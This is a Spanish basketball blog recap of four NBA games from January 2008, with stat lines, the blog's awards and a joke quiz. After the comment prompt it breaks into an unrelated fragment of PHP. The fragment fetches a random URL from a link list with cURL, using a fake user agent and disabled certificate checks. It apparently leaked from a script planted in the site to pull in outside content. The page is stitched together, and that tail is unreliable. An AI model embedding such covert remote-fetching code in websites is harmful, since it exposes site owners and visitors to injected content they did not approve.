La crónica (26/01/08)

27 de January de 2008 por Viva_Dirk

Ayer se disputaron 4 partidos, salvo el Hornets-Spurs, todos con equipos de la zona baja. Aquí va el resumen en imágenes de lo ocurrido:

Miami rompió su racha de 14 derrotas consecutivas ganando por 98-96 a los Pacers. WaWadede estelar se fue a 35-8-4 con un 60% en tiros y estuvo bien acompañado en la anotación por Blount con 19 puntos, Wright con un doble-doble y unos sorprendentes 6 robos de balón por parte de Jason Williams. Por los Pacers brilló Mike Dunleavy con 25-6-3 y 8 de 14 en tiros, pero no estuvo acompañado por ninguno de sus compañeros. Los Sixers lograron su tercera victoria en lo que va de año, con una gran actuación de Andre Iguodala que acabó con 33-6-5, y que tuvo en Andre Miller (22-9) y Samuel Dalembert (7-14-3, 2 robos y 3 tapones) una perfecta ayuda para compensar las buenas actuaciones de Jason Richardson con 35-6 y Emeka Okafor que acabó con 17-16. Estos dos tuvieron en Gerald Wallace la cara de sus 10 asistencias y la cruz en su fatal 4 de 17 en tiros. El partido entre Grizzlies y Clippers tuvo que decidirse en el tiempo extra, donde los ositos se llevaron el gato al agua. Grandes actuaciones de Rudy Gay con 34-12, M.Miller con 27-4-5 y Lowry que fue decisivo en la prórroga y finalizó con 21-8-4. Navarro en su segundo partido consecutivo como titular jugó 46 minutos y cuajó una buena actuación con 18 puntos, 5 rebotes y 3 asistencias. Warrick desde el banco anotó 17 puntos en 25 minutos. Por los Clippers, Maggette fue el mejor con 35 puntos y 9 rebotes, acompañado por Tim Thomas (ambos no acabaron el partido por 6 faltas) que hizo 23-8 con una tremenda serie de tiro, y Mobley&Cassell sumaron 40 puntos, 6 rebotes y 6 asistencias. El lider del Oeste sigue sólido y en este caso la víctima fueron los Spurs, que no tuvieron nada que hacer ante los 32 puntos de West, el 17-11 de Paul, los 12 rebotes de Chandler y los 22 puntos con 9 de 14 en tiros de Stojakovic; en los Spurs solo Duncan y Parker superaron los 15 puntos, pero ningun estuvo en su nivel.

Los Box-Scores:

Pacers 96-Heat 98

76ers 103-Bobcats 96

Clippers 120-Grizzlies 125

Hornets 102-Spurs 78

Nuestros premios:

MVP: Dwyane Wade acabó su actuación de anoche con 35 puntos, 8 rebotes y 4 asistencias, pero además hizo imposible la remontada de Indiana cuando a 5.8 segundos para el final cortó un pase, que aunque sin llegar a robar el balón, dejó a Andre Owens sin tiempo para lanzar a canasta.

Rookie: Navarro tuvo una buena actuación frente a los Clippers, el internacional español acabó el encuentro con 18 puntos, 5 rebotes, 3 asistencias, 5 de 11 en tiros y 3 pérdidas, que si contamos con que estuvo en cancha 46 minutos no son muchas.

Sorpresa: No hubo ninguna actuación especialmente sorprendente, pero por lo poco habitual, el premio recae en los 14 puntos y 10 rebotes de Wright en la victoria de Miami sobre Indiana.

Decepción: Los Spurs en general que fueron derrotados por 24 puntos, y Manu Ginobili en particular, el mejor sexto hombre del campeonato se quedó esta vez en 11 puntos, con 3 pérdidas y una serie de 4 de 12 en tiros.

Pasatiempo

¿Porque se rien Ricky Davis y Mark Blount?

Davis y Blount

a) Porque han ganado un partido de los 15 últimos.

b) Por los 13.5 millones de dolares que cobran entre ambos.

c) Por los 6 robos de balon de Jason Williams.

d) De un chiste que les ha contado Pat Riley.

e) Del 5 de 24 en tiros que acumula Ricky en sus últimos 4 partidos.

f) Disimulan para poder darse la mano por detrás.

Respuesta correcta: Seguro que la opción b les hace mucha gracia, pero la correcta es la c. El ganador recibirá un ejemplar del libro de Jason Williams Yo y la defensa, del que son fieles lectores jugadores como el propio Ricky Davis, Eddy Curry o Smush Parker.

Para acabar las 10 mejores jugadas de anoche que nos dejan alguna de concurso de mates:

 

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>